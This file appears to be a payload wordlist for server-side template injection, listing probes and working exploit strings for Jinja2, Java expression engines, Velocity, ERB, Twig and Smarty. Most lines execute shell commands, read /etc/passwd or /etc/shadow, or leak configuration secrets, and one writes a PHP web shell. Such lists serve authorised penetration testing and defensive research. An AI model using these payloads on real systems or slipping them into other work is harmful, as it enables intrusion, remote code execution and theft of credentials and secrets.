{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
{{7*'7'}}
${7*'7'}
{{config}}
{{self}}
{{request}}
{{config.items()}}
{{settings}}
{{settings.SECRET_KEY}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}
{{lipsum.__globals__['os'].popen('ls').read()}}
{{lipsum.__globals__.os.popen('id').read()}}
{{lipsum.__globals__.os.popen('cat /etc/passwd').read()}}
{{lipsum.__globals__.os.popen('ls').read()}}
{{lipsum.__globals__.os.popen('whoami').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('cat /etc/passwd').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('ls').read()}}{%endif%}{%endfor%}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat /etc/passwd').read()}}{%endif%}{%endfor%}
{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read()}}{%endif%}{%endfor%}
{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()")}}{%endif%}{%endfor%}
${{<%[%'"}}%\
${7*7}
${{7*7}}
${7*7}${7*7}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getClassLoader().getResource("").getPath()}
$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()
$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami").waitFor()
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
${T(java.lang.Runtime).getRuntime().exec('id')}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd').getInputStream())}
*{7*7}
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('cat /etc/passwd'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
<%= 7 * 7 %>
<%= system("ls") %>
<%= system("cat /etc/passwd") %>
<%= system("id") %>
<%= system("whoami") %>
<%= `ls` %>
<%= `cat /etc/passwd` %>
<%= `id` %>
<%= `whoami` %>
<%= IO.popen('ls').readlines() %>
<%= IO.popen('cat /etc/passwd').readlines() %>
<%= IO.popen('id').readlines() %>
<%= File.open('/etc/passwd').read %>
<%= File.open('/etc/shadow').read %>
<%= Dir.entries('/') %>
<%= require 'open3' %><%= Open3.capture2('ls') %>
<%= require 'open3' %><%= Open3.capture2('cat /etc/passwd') %>
{{7*7}}
{{7*'7'}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /etc/passwd")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{['ls']|filter('system')}}
{{['whoami']|filter('system')}}
{{['id']|filter('passthru')}}
{{['cat /etc/passwd']|filter('passthru')}}
{{['ls','/']|filter('system')}}
{{['cat','/etc/passwd']|filter('system')}}
{{_self.env.enableDebug()}}
{{_self}}
{{app}}
{{app.request.server.all|join(',')}}
{{dump(app)}}
{{app.request.query.filter(0,'current_user',1024,{'options':'system'})}}
{php}echo `id`;{/php}
{php}echo `cat /etc/passwd`;{/php}
{php}echo system('id');{/php}
{php}echo shell_exec('id');{/php}
{php}echo exec('id');{/php}
{php}echo passthru('id');{/php}
{php}print_r(file_get_contents('/etc/passwd'));{/php}
{php}print_r(scandir('/'));{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php eval($_GET['cmd']);?>",self::clearConfig())}
{system('cat /etc/passwd')}
{system('id')}
{system('ls')}
